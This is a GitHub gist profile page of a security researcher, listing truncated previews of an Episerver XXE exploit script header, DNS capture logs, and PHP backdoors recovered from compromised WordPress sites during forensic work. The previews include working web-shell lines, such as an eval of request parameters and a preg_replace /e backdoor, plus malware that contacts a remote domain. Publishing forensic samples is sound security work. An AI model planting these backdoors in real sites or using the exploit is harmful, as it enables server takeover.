Jonas Lejon jonaslejon

🏠
Working from home
Block or report user

Report or block jonaslejon

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@jonaslejon
jonaslejon / gist:229e96e45bcb527cdf63b8ee930687af
Created Oct 31, 2019
ECC (ed25519) PGP key for info@wpsec.com
@jonaslejon
jonaslejon / dns-resolvers.txt
Last active Jun 25, 2018
DNS Resolvers with tcpdump output
## Resolver 1 Bahnhof
21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49)
@jonaslejon
jonaslejon / episploit.py
Last active Aug 28, 2018
Episerver XXE Vulnerability - Exploit Episploit
#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## Starts a listening webserver, so the exploit needs a public IP and an unfiltered port; configure RHOST below!
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
##
## Usage: ./episploit.py <target> [file-to-read]
@jonaslejon
jonaslejon / wp-uninstall.php
Created Apr 8, 2018
WordPress backdoor found in file wp-uninstall.php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
@jonaslejon
jonaslejon / _input__test.php.
Created Oct 10, 2017
WordPress backdoor found during a forensic investigation of a blog. It was located in the folder wp-content/uploads/
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
@jonaslejon
jonaslejon / wp-blog-header.php
Last active Jul 7, 2018
Malware found on WordPress installation. This is the deobfuscated version
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
@jonaslejon
jonaslejon / file-upload.php
Created Feb 10, 2016
PHP file upload backdoor
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
@jonaslejon
jonaslejon / php-preg-replace-backdoor.php
Created Feb 10, 2016
Short PHP backdoor using preg_replace. Found during forensic investigation
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');
@jonaslejon
jonaslejon / PHP-cookie-backdoor.php
Last active Dec 13, 2017
This is a PHP COOKIE backdoor that was found during a forensic investigation
@jonaslejon
jonaslejon / web-backdoor.php
Created Jan 11, 2016
Web PHP Malware found during forensic investigation
<?php
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%